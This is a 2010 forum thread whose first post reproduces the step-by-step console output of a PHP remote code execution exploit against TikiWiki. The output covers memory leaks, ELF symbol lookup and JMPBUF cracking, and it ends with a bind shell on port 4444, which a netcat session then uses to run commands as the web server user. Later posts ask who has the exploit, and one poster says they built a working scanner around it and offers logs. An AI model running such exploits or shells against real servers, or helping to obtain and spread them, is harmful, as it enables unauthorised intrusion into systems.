hozarares Posted October 7, 2010

$ ./exploit.py -h http://t.testsystem/
PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
Copyright © 2010 Stefan Esser/SektionEins GmbH *** DO NOT DISTRIBUTE ***
[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine XXX version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP...
Spawning a shell at port 4444...

$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am
system("uname -a");
Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
system("id");
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
...
adi003user Posted October 8, 2010

Explained here: Nibbles microblog, "Pwning PHP for fun and chocapicz"
michee Posted December 13, 2010

Just out of curiosity, does anyone have this exploit?
napoletanii Posted December 19, 2010

I built a small scanner around it... and it works well... surprisingly well, actually... if you want logs, I'll give you some...